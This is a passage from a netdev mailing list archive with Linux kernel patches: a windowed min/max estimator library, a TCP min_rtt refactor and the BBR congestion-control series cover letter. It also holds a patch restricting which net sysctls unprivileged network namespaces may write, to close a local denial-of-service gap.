Netdev List
 help / color / mirror / Atom feed
* [PATCH v3 net-next 02/16] lib/win_minmax: windowed min or max estimator
From: Neal Cardwell @ 2016-09-18 22:03 UTC (permalink / raw)
  To: David Miller
  Cc: netdev, Neal Cardwell, Van Jacobson, Yuchung Cheng,
	Nandita Dukkipati, Eric Dumazet, Soheil Hassas Yeganeh
In-Reply-To: <1474236233-28511-1-git-send-email-ncardwell@google.com>

This commit introduces a generic library to estimate either the min or
max value of a time-varying variable over a recent time window. This
is code originally from Kathleen Nichols. The current form of the code
is from Van Jacobson.

A single struct minmax_sample will track the estimated windowed-max
value of the series if you call minmax_running_max() or the estimated
windowed-min value of the series if you call minmax_running_min().

Nearly equivalent code is already in place for minimum RTT estimation
in the TCP stack. This commit extracts that code and generalizes it to
handle both min and max. Moving the code here reduces the footprint
and complexity of the TCP code base and makes the filter generally
available for other parts of the codebase, including an upcoming TCP
congestion control module.

This library works well for time series where the measurements are
smoothly increasing or decreasing.

Signed-off-by: Van Jacobson <vanj@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Nandita Dukkipati <nanditad@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
---
 include/linux/win_minmax.h | 37 +++++++++++++++++
 lib/Makefile               |  2 +-
 lib/win_minmax.c           | 98 ++++++++++++++++++++++++++++++++++++++++++++++
 3 files changed, 136 insertions(+), 1 deletion(-)
 create mode 100644 include/linux/win_minmax.h
 create mode 100644 lib/win_minmax.c

diff --git a/include/linux/win_minmax.h b/include/linux/win_minmax.h
new file mode 100644
index 0000000..5656960
--- /dev/null
+++ b/include/linux/win_minmax.h
@@ -0,0 +1,37 @@
+/**
+ * lib/minmax.c: windowed min/max tracker by Kathleen Nichols.
+ *
+ */
+#ifndef MINMAX_H
+#define MINMAX_H
+
+#include <linux/types.h>
+
+/* A single data point for our parameterized min-max tracker */
+struct minmax_sample {
+	u32	t;	/* time measurement was taken */
+	u32	v;	/* value measured */
+};
+
+/* State for the parameterized min-max tracker */
+struct minmax {
+	struct minmax_sample s[3];
+};
+
+static inline u32 minmax_get(const struct minmax *m)
+{
+	return m->s[0].v;
+}
+
+static inline u32 minmax_reset(struct minmax *m, u32 t, u32 meas)
+{
+	struct minmax_sample val = { .t = t, .v = meas };
+
+	m->s[2] = m->s[1] = m->s[0] = val;
+	return m->s[0].v;
+}
+
+u32 minmax_running_max(struct minmax *m, u32 win, u32 t, u32 meas);
+u32 minmax_running_min(struct minmax *m, u32 win, u32 t, u32 meas);
+
+#endif
diff --git a/lib/Makefile b/lib/Makefile
index 5dc77a8..df747e5 100644
--- a/lib/Makefile
+++ b/lib/Makefile
@@ -22,7 +22,7 @@ lib-y := ctype.o string.o vsprintf.o cmdline.o \
 	 sha1.o chacha20.o md5.o irq_regs.o argv_split.o \
 	 flex_proportions.o ratelimit.o show_mem.o \
 	 is_single_threaded.o plist.o decompress.o kobject_uevent.o \
-	 earlycpio.o seq_buf.o nmi_backtrace.o nodemask.o
+	 earlycpio.o seq_buf.o nmi_backtrace.o nodemask.o win_minmax.o
 
 lib-$(CONFIG_MMU) += ioremap.o
 lib-$(CONFIG_SMP) += cpumask.o
diff --git a/lib/win_minmax.c b/lib/win_minmax.c
new file mode 100644
index 0000000..c8420d4
--- /dev/null
+++ b/lib/win_minmax.c
@@ -0,0 +1,98 @@
+/**
+ * lib/minmax.c: windowed min/max tracker
+ *
+ * Kathleen Nichols' algorithm for tracking the minimum (or maximum)
+ * value of a data stream over some fixed time interval.  (E.g.,
+ * the minimum RTT over the past five minutes.) It uses constant
+ * space and constant time per update yet almost always delivers
+ * the same minimum as an implementation that has to keep all the
+ * data in the window.
+ *
+ * The algorithm keeps track of the best, 2nd best & 3rd best min
+ * values, maintaining an invariant that the measurement time of
+ * the n'th best >= n-1'th best. It also makes sure that the three
+ * values are widely separated in the time window since that bounds
+ * the worse case error when that data is monotonically increasing
+ * over the window.
+ *
+ * Upon getting a new min, we can forget everything earlier because
+ * it has no value - the new min is <= everything else in the window
+ * by definition and it's the most recent. So we restart fresh on
+ * every new min and overwrites 2nd & 3rd choices. The same property
+ * holds for 2nd & 3rd best.
+ */
+#include <linux/module.h>
+#include <linux/win_minmax.h>
+
+/* As time advances, update the 1st, 2nd, and 3rd choices. */
+static u32 minmax_subwin_update(struct minmax *m, u32 win,
+				const struct minmax_sample *val)
+{
+	u32 dt = val->t - m->s[0].t;
+
+	if (unlikely(dt > win)) {
+		/*
+		 * Passed entire window without a new val so make 2nd
+		 * choice the new val & 3rd choice the new 2nd choice.
+		 * we may have to iterate this since our 2nd choice
+		 * may also be outside the window (we checked on entry
+		 * that the third choice was in the window).
+		 */
+		m->s[0] = m->s[1];
+		m->s[1] = m->s[2];
+		m->s[2] = *val;
+		if (unlikely(val->t - m->s[0].t > win)) {
+			m->s[0] = m->s[1];
+			m->s[1] = m->s[2];
+			m->s[2] = *val;
+		}
+	} else if (unlikely(m->s[1].t == m->s[0].t) && dt > win/4) {
+		/*
+		 * We've passed a quarter of the window without a new val
+		 * so take a 2nd choice from the 2nd quarter of the window.
+		 */
+		m->s[2] = m->s[1] = *val;
+	} else if (unlikely(m->s[2].t == m->s[1].t) && dt > win/2) {
+		/*
+		 * We've passed half the window without finding a new val
+		 * so take a 3rd choice from the last half of the window
+		 */
+		m->s[2] = *val;
+	}
+	return m->s[0].v;
+}
+
+/* Check if new measurement updates the 1st, 2nd or 3rd choice max. */
+u32 minmax_running_max(struct minmax *m, u32 win, u32 t, u32 meas)
+{
+	struct minmax_sample val = { .t = t, .v = meas };
+
+	if (unlikely(val.v >= m->s[0].v) ||	  /* found new max? */
+	    unlikely(val.t - m->s[2].t > win))	  /* nothing left in window? */
+		return minmax_reset(m, t, meas);  /* forget earlier samples */
+
+	if (unlikely(val.v >= m->s[1].v))
+		m->s[2] = m->s[1] = val;
+	else if (unlikely(val.v >= m->s[2].v))
+		m->s[2] = val;
+
+	return minmax_subwin_update(m, win, &val);
+}
+EXPORT_SYMBOL(minmax_running_max);
+
+/* Check if new measurement updates the 1st, 2nd or 3rd choice min. */
+u32 minmax_running_min(struct minmax *m, u32 win, u32 t, u32 meas)
+{
+	struct minmax_sample val = { .t = t, .v = meas };
+
+	if (unlikely(val.v <= m->s[0].v) ||	  /* found new min? */
+	    unlikely(val.t - m->s[2].t > win))	  /* nothing left in window? */
+		return minmax_reset(m, t, meas);  /* forget earlier samples */
+
+	if (unlikely(val.v <= m->s[1].v))
+		m->s[2] = m->s[1] = val;
+	else if (unlikely(val.v <= m->s[2].v))
+		m->s[2] = val;
+
+	return minmax_subwin_update(m, win, &val);
+}
-- 
2.8.0.rc3.226.g39d4020

^ permalink raw reply related

* [PATCH v3 net-next 03/16] tcp: use windowed min filter library for TCP min_rtt estimation
From: Neal Cardwell @ 2016-09-18 22:03 UTC (permalink / raw)
  To: David Miller
  Cc: netdev, Neal Cardwell, Van Jacobson, Yuchung Cheng,
	Nandita Dukkipati, Eric Dumazet, Soheil Hassas Yeganeh
In-Reply-To: <1474236233-28511-1-git-send-email-ncardwell@google.com>

Refactor the TCP min_rtt code to reuse the new win_minmax library in
lib/win_minmax.c to simplify the TCP code.

This is a pure refactor: the functionality is exactly the same. We
just moved the windowed min code to make TCP easier to read and
maintain, and to allow other parts of the kernel to use the windowed
min/max filter code.

Signed-off-by: Van Jacobson <vanj@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Nandita Dukkipati <nanditad@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
---
 include/linux/tcp.h      |  5 ++--
 include/net/tcp.h        |  2 +-
 net/ipv4/tcp.c           |  2 +-
 net/ipv4/tcp_input.c     | 64 ++++--------------------------------------------
 net/ipv4/tcp_minisocks.c |  2 +-
 5 files changed, 10 insertions(+), 65 deletions(-)

diff --git a/include/linux/tcp.h b/include/linux/tcp.h
index c723a46..6433cc8 100644
--- a/include/linux/tcp.h
+++ b/include/linux/tcp.h
@@ -19,6 +19,7 @@
 
 
 #include <linux/skbuff.h>
+#include <linux/win_minmax.h>
 #include <net/sock.h>
 #include <net/inet_connection_sock.h>
 #include <net/inet_timewait_sock.h>
@@ -234,9 +235,7 @@ struct tcp_sock {
 	u32	mdev_max_us;	/* maximal mdev for the last rtt period	*/
 	u32	rttvar_us;	/* smoothed mdev_max			*/
 	u32	rtt_seq;	/* sequence number to update rttvar	*/
-	struct rtt_meas {
-		u32 rtt, ts;	/* RTT in usec and sampling time in jiffies. */
-	} rtt_min[3];
+	struct  minmax rtt_min;
 
 	u32	packets_out;	/* Packets which are "in flight"	*/
 	u32	retrans_out;	/* Retransmitted packets out		*/
diff --git a/include/net/tcp.h b/include/net/tcp.h
index fdfbedd..2f1648a 100644
--- a/include/net/tcp.h
+++ b/include/net/tcp.h
@@ -671,7 +671,7 @@ static inline bool tcp_ca_dst_locked(const struct dst_entry *dst)
 /* Minimum RTT in usec. ~0 means not available. */
 static inline u32 tcp_min_rtt(const struct tcp_sock *tp)
 {
-	return tp->rtt_min[0].rtt;
+	return minmax_get(&tp->rtt_min);
 }
 
 /* Compute the actual receive window we are currently advertising.
diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
index a13fcb3..5b0b49c 100644
--- a/net/ipv4/tcp.c
+++ b/net/ipv4/tcp.c
@@ -387,7 +387,7 @@ void tcp_init_sock(struct sock *sk)
 
 	icsk->icsk_rto = TCP_TIMEOUT_INIT;
 	tp->mdev_us = jiffies_to_usecs(TCP_TIMEOUT_INIT);
-	tp->rtt_min[0].rtt = ~0U;
+	minmax_reset(&tp->rtt_min, tcp_time_stamp, ~0U);
 
 	/* So many TCP implementations out there (incorrectly) count the
 	 * initial SYN frame in their delayed-ACK and congestion control
diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
index 70b892d..ac5b38f 100644
--- a/net/ipv4/tcp_input.c
+++ b/net/ipv4/tcp_input.c
@@ -2879,67 +2879,13 @@ static void tcp_fastretrans_alert(struct sock *sk, const int acked,
 	*rexmit = REXMIT_LOST;
 }
 
-/* Kathleen Nichols' algorithm for tracking the minimum value of
- * a data stream over some fixed time interval. (E.g., the minimum
- * RTT over the past five minutes.) It uses constant space and constant
- * time per update yet almost always delivers the same minimum as an
- * implementation that has to keep all the data in the window.
- *
- * The algorithm keeps track of the best, 2nd best & 3rd best min
- * values, maintaining an invariant that the measurement time of the
- * n'th best >= n-1'th best. It also makes sure that the three values
- * are widely separated in the time window since that bounds the worse
- * case error when that data is monotonically increasing over the window.
- *
- * Upon getting a new min, we can forget everything earlier because it
- * has no value - the new min is <= everything else in the window by
- * definition and it's the most recent. So we restart fresh on every new min
- * and overwrites 2nd & 3rd choices. The same property holds for 2nd & 3rd
- * best.
- */
 static void tcp_update_rtt_min(struct sock *sk, u32 rtt_us)
 {
-	const u32 now = tcp_time_stamp, wlen = sysctl_tcp_min_rtt_wlen * HZ;
-	struct rtt_meas *m = tcp_sk(sk)->rtt_min;
-	struct rtt_meas rttm = {
-		.rtt = likely(rtt_us) ? rtt_us : jiffies_to_usecs(1),
-		.ts = now,
-	};
-	u32 elapsed;
-
-	/* Check if the new measurement updates the 1st, 2nd, or 3rd choices */
-	if (unlikely(rttm.rtt <= m[0].rtt))
-		m[0] = m[1] = m[2] = rttm;
-	else if (rttm.rtt <= m[1].rtt)
-		m[1] = m[2] = rttm;
-	else if (rttm.rtt <= m[2].rtt)
-		m[2] = rttm;
-
-	elapsed = now - m[0].ts;
-	if (unlikely(elapsed > wlen)) {
-		/* Passed entire window without a new min so make 2nd choice
-		 * the new min & 3rd choice the new 2nd. So forth and so on.
-		 */
-		m[0] = m[1];
-		m[1] = m[2];
-		m[2] = rttm;
-		if (now - m[0].ts > wlen) {
-			m[0] = m[1];
-			m[1] = rttm;
-			if (now - m[0].ts > wlen)
-				m[0] = rttm;
-		}
-	} else if (m[1].ts == m[0].ts && elapsed > wlen / 4) {
-		/* Passed a quarter of the window without a new min so
-		 * take 2nd choice from the 2nd quarter of the window.
-		 */
-		m[2] = m[1] = rttm;
-	} else if (m[2].ts == m[1].ts && elapsed > wlen / 2) {
-		/* Passed half the window without a new min so take the 3rd
-		 * choice from the last half of the window.
-		 */
-		m[2] = rttm;
-	}
+	struct tcp_sock *tp = tcp_sk(sk);
+	u32 wlen = sysctl_tcp_min_rtt_wlen * HZ;
+
+	minmax_running_min(&tp->rtt_min, wlen, tcp_time_stamp,
+			   rtt_us ? : jiffies_to_usecs(1));
 }
 
 static inline bool tcp_ack_update_rtt(struct sock *sk, const int flag,
diff --git a/net/ipv4/tcp_minisocks.c b/net/ipv4/tcp_minisocks.c
index f63c73d..5689471 100644
--- a/net/ipv4/tcp_minisocks.c
+++ b/net/ipv4/tcp_minisocks.c
@@ -464,7 +464,7 @@ struct sock *tcp_create_openreq_child(const struct sock *sk,
 
 		newtp->srtt_us = 0;
 		newtp->mdev_us = jiffies_to_usecs(TCP_TIMEOUT_INIT);
-		newtp->rtt_min[0].rtt = ~0U;
+		minmax_reset(&newtp->rtt_min, tcp_time_stamp, ~0U);
 		newicsk->icsk_rto = TCP_TIMEOUT_INIT;
 
 		newtp->packets_out = 0;
-- 
2.8.0.rc3.226.g39d4020

^ permalink raw reply related

* [PATCH v3 net-next 01/16] tcp: cdg: rename struct minmax in tcp_cdg.c to avoid a naming conflict
From: Neal Cardwell @ 2016-09-18 22:03 UTC (permalink / raw)
  To: David Miller
  Cc: netdev, Soheil Hassas Yeganeh, Neal Cardwell, Yuchung Cheng,
	Eric Dumazet, Kenneth Klette Jonassen
In-Reply-To: <1474236233-28511-1-git-send-email-ncardwell@google.com>

From: Soheil Hassas Yeganeh <soheil@google.com>

The upcoming change "lib/win_minmax: windowed min or max estimator"
introduces a struct called minmax, which is then included in
include/linux/tcp.h in the upcoming change "tcp: use windowed min
filter library for TCP min_rtt estimation". This would create a
compilation error for tcp_cdg.c, which defines its own minmax
struct. To avoid this naming conflict (and potentially others in the
future), this commit renames the version used in tcp_cdg.c to
cdg_minmax.

Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Signed-off-by: Yuchung Cheng <ycheng@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Kenneth Klette Jonassen <kennetkl@ifi.uio.no>
---
 net/ipv4/tcp_cdg.c | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/net/ipv4/tcp_cdg.c b/net/ipv4/tcp_cdg.c
index 03725b2..35b2803 100644
--- a/net/ipv4/tcp_cdg.c
+++ b/net/ipv4/tcp_cdg.c
@@ -56,7 +56,7 @@ MODULE_PARM_DESC(use_shadow, "use shadow window heuristic");
 module_param(use_tolerance, bool, 0644);
 MODULE_PARM_DESC(use_tolerance, "use loss tolerance heuristic");
 
-struct minmax {
+struct cdg_minmax {
 	union {
 		struct {
 			s32 min;
@@ -74,10 +74,10 @@ enum cdg_state {
 };
 
 struct cdg {
-	struct minmax rtt;
-	struct minmax rtt_prev;
-	struct minmax *gradients;
-	struct minmax gsum;
+	struct cdg_minmax rtt;
+	struct cdg_minmax rtt_prev;
+	struct cdg_minmax *gradients;
+	struct cdg_minmax gsum;
 	bool gfilled;
 	u8  tail;
 	u8  state;
@@ -353,7 +353,7 @@ static void tcp_cdg_cwnd_event(struct sock *sk, const enum tcp_ca_event ev)
 {
 	struct cdg *ca = inet_csk_ca(sk);
 	struct tcp_sock *tp = tcp_sk(sk);
-	struct minmax *gradients;
+	struct cdg_minmax *gradients;
 
 	switch (ev) {
 	case CA_EVENT_CWND_RESTART:
-- 
2.8.0.rc3.226.g39d4020

^ permalink raw reply related

* [PATCH v3 net-next 00/16] tcp: BBR congestion control algorithm
From: Neal Cardwell @ 2016-09-18 22:03 UTC (permalink / raw)
  To: David Miller; +Cc: netdev, Neal Cardwell

tcp: BBR congestion control algorithm

This patch series implements a new TCP congestion control algorithm:
BBR (Bottleneck Bandwidth and RTT). A paper with a detailed
description of BBR will be published in ACM Queue, September-October
2016, as "BBR: Congestion-Based Congestion Control". BBR is widely
deployed in production at Google.

The patch series starts with a set of supporting infrastructure
changes, including a few that extend the congestion control
framework. The last patch adds BBR as a TCP congestion control
module. Please see individual patches for the details.

- v2 -> v3: fix another issue caught by build bots:
 - adjust rate_sample struct initialization syntax to allow gcc-4.4 to compile
   the "tcp: track data delivery rate for a TCP connection" patch; also
   adjusted some similar syntax in "tcp_bbr: add BBR congestion control"

- v1 -> v2: fix issues caught by build bots:
 - fix "tcp: export data delivery rate" to use rate64 instead of rate,
   so there is a 64-bit numerator for the do_div call
 - fix conflicting definitions for minmax caused by
   "tcp: use windowed min filter library for TCP min_rtt estimation"
   with a new commit:
   tcp: cdg: rename struct minmax in tcp_cdg.c to avoid a naming conflict
 - fix warning about the use of __packed in
   "tcp: track data delivery rate for a TCP connection",
   which involves the addition of a new commit:
   tcp: switch back to proper tcp_skb_cb size check in tcp_init()  

Eric Dumazet (2):
  net_sched: sch_fq: add low_rate_threshold parameter
  tcp: switch back to proper tcp_skb_cb size check in tcp_init()

Neal Cardwell (8):
  lib/win_minmax: windowed min or max estimator
  tcp: use windowed min filter library for TCP min_rtt estimation
  tcp: count packets marked lost for a TCP connection
  tcp: allow congestion control module to request TSO skb segment count
  tcp: export tcp_tso_autosize() and parameterize minimum number of TSO
    segments
  tcp: export tcp_mss_to_mtu() for congestion control modules
  tcp: increase ICSK_CA_PRIV_SIZE from 64 bytes to 88
  tcp_bbr: add BBR congestion control

Soheil Hassas Yeganeh (2):
  tcp: cdg: rename struct minmax in tcp_cdg.c to avoid a naming conflict
  tcp: track application-limited rate samples

Yuchung Cheng (4):
  tcp: track data delivery rate for a TCP connection
  tcp: export data delivery rate
  tcp: allow congestion control to expand send buffer differently
  tcp: new CC hook to set sending rate with rate_sample in any CA state

 include/linux/tcp.h                |  14 +-
 include/linux/win_minmax.h         |  37 ++
 include/net/inet_connection_sock.h |   4 +-
 include/net/tcp.h                  |  53 ++-
 include/uapi/linux/inet_diag.h     |  13 +
 include/uapi/linux/pkt_sched.h     |   2 +
 include/uapi/linux/tcp.h           |   3 +
 lib/Makefile                       |   2 +-
 lib/win_minmax.c                   |  98 +++++
 net/ipv4/Kconfig                   |  18 +
 net/ipv4/Makefile                  |   3 +-
 net/ipv4/tcp.c                     |  26 +-
 net/ipv4/tcp_bbr.c                 | 875 +++++++++++++++++++++++++++++++++++++
 net/ipv4/tcp_cdg.c                 |  12 +-
 net/ipv4/tcp_cong.c                |   2 +-
 net/ipv4/tcp_input.c               | 154 +++----
 net/ipv4/tcp_minisocks.c           |   5 +-
 net/ipv4/tcp_output.c              |  27 +-
 net/ipv4/tcp_rate.c                | 186 ++++++++
 net/sched/sch_fq.c                 |  22 +-
 20 files changed, 1449 insertions(+), 107 deletions(-)
 create mode 100644 include/linux/win_minmax.h
 create mode 100644 lib/win_minmax.c
 create mode 100644 net/ipv4/tcp_bbr.c
 create mode 100644 net/ipv4/tcp_rate.c

-- 
2.8.0.rc3.226.g39d4020

^ permalink raw reply

* [PATCH] net: explicitly whitelist sysctls for unpriv namespaces
From: Jann Horn @ 2016-09-18 20:58 UTC (permalink / raw)
  To: David S. Miller, Alexey Kuznetsov, James Morris,
	Hideaki YOSHIFUJI, Patrick McHardy
  Cc: netdev

There were two net sysctls that could be written from unprivileged net
namespaces, but weren't actually namespaced.

To fix the existing issues and prevent stuff this from happening again in
the future, explicitly whitelist permitted sysctls.

Note: The current whitelist is "allow everything that was previously
accessible and that doesn't obviously modify global state".

On my system, this patch just removes the write permissions for
ipv4/netfilter/ip_conntrack_max, which would have been usable for a local
DoS. With a different config, the ipv4/vs/debug_level sysctl would also be
affected.

Maximum impact of this seems to be local DoS, and it's a fairly large
commit, so I'm sending this publicly directly.

An alternative (and much smaller) fix would be to just change the
permissions of the two files in question to be 0444 in non-privileged
namespaces, but I believe that this solution is slightly less error-prone.
If you think I should switch to the simple fix, let me know.

Signed-off-by: Jann Horn <jann@thejh.net>
---
 include/linux/sysctl.h                         |  1 +
 net/ax25/sysctl_net_ax25.c                     |  4 +++-
 net/ieee802154/6lowpan/reassembly.c            |  7 +++++--
 net/ipv4/devinet.c                             |  2 ++
 net/ipv4/ip_fragment.c                         | 10 ++++++---
 net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c |  3 +++
 net/ipv4/netfilter/nf_conntrack_proto_icmp.c   |  2 ++
 net/ipv4/sysctl_net_ipv4.c                     |  4 +++-
 net/ipv4/xfrm4_policy.c                        |  1 +
 net/ipv6/addrconf.c                            |  1 +
 net/ipv6/icmp.c                                |  1 +
 net/ipv6/netfilter/nf_conntrack_proto_icmpv6.c |  1 +
 net/ipv6/netfilter/nf_conntrack_reasm.c        |  7 +++++--
 net/ipv6/sysctl_net_ipv6.c                     | 23 ++++++++++++++-------
 net/ipv6/xfrm6_policy.c                        |  1 +
 net/mpls/af_mpls.c                             |  2 ++
 net/netfilter/ipvs/ip_vs_ctl.c                 | 26 ++++++++++++++++++++++++
 net/netfilter/nf_conntrack_proto_generic.c     |  2 ++
 net/netfilter/nf_conntrack_proto_sctp.c        | 16 +++++++++++++++
 net/netfilter/nf_conntrack_proto_tcp.c         | 26 ++++++++++++++++++++++++
 net/netfilter/nf_conntrack_proto_udp.c         |  4 ++++
 net/netfilter/nf_conntrack_proto_udplite.c     |  2 ++
 net/netfilter/nf_log.c                         |  1 +
 net/rds/tcp.c                                  |  2 ++
 net/sctp/sysctl.c                              |  4 +++-
 net/sysctl_net.c                               | 28 +++++++++++++++++---------
 26 files changed, 154 insertions(+), 27 deletions(-)

diff --git a/include/linux/sysctl.h b/include/linux/sysctl.h
index a4f7203..c47c52d 100644
--- a/include/linux/sysctl.h
+++ b/include/linux/sysctl.h
@@ -116,6 +116,7 @@ struct ctl_table
 	struct ctl_table_poll *poll;
 	void *extra1;
 	void *extra2;
+	bool namespaced;		/* allow writes in unpriv netns? */
 };
 
 struct ctl_node {
diff --git a/net/ax25/sysctl_net_ax25.c b/net/ax25/sysctl_net_ax25.c
index 919a5ce..8e6ab36 100644
--- a/net/ax25/sysctl_net_ax25.c
+++ b/net/ax25/sysctl_net_ax25.c
@@ -158,8 +158,10 @@ int ax25_register_dev_sysctl(ax25_dev *ax25_dev)
 	if (!table)
 		return -ENOMEM;
 
-	for (k = 0; k < AX25_MAX_VALUES; k++)
+	for (k = 0; k < AX25_MAX_VALUES; k++) {
 		table[k].data = &ax25_dev->values[k];
+		table[k].namespaced = true;
+	}
 
 	snprintf(path, sizeof(path), "net/ax25/%s", ax25_dev->dev->name);
 	ax25_dev->sysheader = register_net_sysctl(&init_net, path, table);
diff --git a/net/ieee802154/6lowpan/reassembly.c b/net/ieee802154/6lowpan/reassembly.c
index 30d875d..8a1d5b7 100644
--- a/net/ieee802154/6lowpan/reassembly.c
+++ b/net/ieee802154/6lowpan/reassembly.c
@@ -456,7 +456,8 @@ static struct ctl_table lowpan_frags_ns_ctl_table[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_minmax,
-		.extra1		= &init_net.ieee802154_lowpan.frags.low_thresh
+		.extra1		= &init_net.ieee802154_lowpan.frags.low_thresh,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "6lowpanfrag_low_thresh",
@@ -465,7 +466,8 @@ static struct ctl_table lowpan_frags_ns_ctl_table[] = {
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_minmax,
 		.extra1		= &zero,
-		.extra2		= &init_net.ieee802154_lowpan.frags.high_thresh
+		.extra2		= &init_net.ieee802154_lowpan.frags.high_thresh,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "6lowpanfrag_time",
@@ -473,6 +475,7 @@ static struct ctl_table lowpan_frags_ns_ctl_table[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/ipv4/devinet.c b/net/ipv4/devinet.c
index 062a67c..8bbed18 100644
--- a/net/ipv4/devinet.c
+++ b/net/ipv4/devinet.c
@@ -2166,6 +2166,7 @@ static int ipv4_doint_and_flush(struct ctl_table *ctl, int write,
 		.mode		= mval, \
 		.proc_handler	= proc, \
 		.extra1		= &ipv4_devconf, \
+		.namespaced	= true, \
 	}
 
 #define DEVINET_SYSCTL_RW_ENTRY(attr, name) \
@@ -2310,6 +2311,7 @@ static struct ctl_table ctl_forward_entry[] = {
 		.proc_handler	= devinet_sysctl_forward,
 		.extra1		= &ipv4_devconf,
 		.extra2		= &init_net,
+		.namespaced	= true,
 	},
 	{ },
 };
diff --git a/net/ipv4/ip_fragment.c b/net/ipv4/ip_fragment.c
index bbe7f72..49a62e0 100644
--- a/net/ipv4/ip_fragment.c
+++ b/net/ipv4/ip_fragment.c
@@ -729,7 +729,8 @@ static struct ctl_table ip4_frags_ns_ctl_table[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_minmax,
-		.extra1		= &init_net.ipv4.frags.low_thresh
+		.extra1		= &init_net.ipv4.frags.low_thresh,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ipfrag_low_thresh",
@@ -738,7 +739,8 @@ static struct ctl_table ip4_frags_ns_ctl_table[] = {
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_minmax,
 		.extra1		= &zero,
-		.extra2		= &init_net.ipv4.frags.high_thresh
+		.extra2		= &init_net.ipv4.frags.high_thresh,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ipfrag_time",
@@ -746,6 +748,7 @@ static struct ctl_table ip4_frags_ns_ctl_table[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ipfrag_max_dist",
@@ -753,7 +756,8 @@ static struct ctl_table ip4_frags_ns_ctl_table[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_minmax,
-		.extra1		= &zero
+		.extra1		= &zero,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c b/net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c
index ae1a71a..8ade484 100644
--- a/net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c
+++ b/net/ipv4/netfilter/nf_conntrack_l3proto_ipv4.c
@@ -218,6 +218,7 @@ static struct ctl_table ip_ct_sysctl_table[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0444,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_buckets",
@@ -230,6 +231,7 @@ static struct ctl_table ip_ct_sysctl_table[] = {
 		.maxlen		= sizeof(int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec,
+		.namespaced	= true,
 	},
 	{
 		.procname	= "ip_conntrack_log_invalid",
@@ -238,6 +240,7 @@ static struct ctl_table ip_ct_sysctl_table[] = {
 		.proc_handler	= proc_dointvec_minmax,
 		.extra1		= &log_invalid_proto_min,
 		.extra2		= &log_invalid_proto_max,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/ipv4/netfilter/nf_conntrack_proto_icmp.c b/net/ipv4/netfilter/nf_conntrack_proto_icmp.c
index c567e1b..6d5be74 100644
--- a/net/ipv4/netfilter/nf_conntrack_proto_icmp.c
+++ b/net/ipv4/netfilter/nf_conntrack_proto_icmp.c
@@ -324,6 +324,7 @@ static struct ctl_table icmp_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{ }
 };
@@ -334,6 +335,7 @@ static struct ctl_table icmp_compat_sysctl_table[] = {
 		.maxlen		= sizeof(unsigned int),
 		.mode		= 0644,
 		.proc_handler	= proc_dointvec_jiffies,
+		.namespaced	= true,
 	},
 	{ }
 };
diff --git a/net/ipv4/sysctl_net_ipv4.c b/net/ipv4/sysctl_net_ipv4.c
index 1cb67de..9791f69 100644
--- a/net/ipv4/sysctl_net_ipv4.c
+++ b/net/ipv4/sysctl_net_ipv4.c
@@ -987,8 +987,10 @@ static __net_init int ipv4_sysctl_init_net(struct net *net)
 			goto err_alloc;
 
 		/* Update the variables to point into the current struct net */
-		for (i = 0; i < ARRAY_SIZE(ipv4_net_table) - 1; i++)
+		for (i = 0; i < ARRAY_SIZE(ipv4_net_table) - 1; i++) {
 			table[i].data += (void *)net - (void *)&init_net;
+			table[i].namespaced = true;
+		}
 	}
 
 	net->ipv4.ipv4_hdr = register_net_sysctl(net, "net/ipv4", table);
diff --git a/net/ipv4/xfrm4_policy.c b/net/ipv4/xfrm4_policy.c
index 41f5b50..be8436e 100644
--- a/net/ipv4/xfrm4_policy.c
+++ b/net/ipv4/xfrm4_policy.c
@@ -291,6 +291,7 @@ static struct ctl_table xfrm4_policy_table[] = {
 		.maxlen         = sizeof(int),
 		.mode           = 0644,
 		.proc_handler   = proc_dointvec,
+		.namespaced     = true,
 	},
 	{ }
 };
diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
index 2f1f5d4..73b01c0 100644
--- a/net/ipv6/addrconf.c
+++ b/net/ipv6/addrconf.c
@@ -6046,6 +6046,7 @@ static int __addrconf_sysctl_register(struct net *net, char *dev_name,
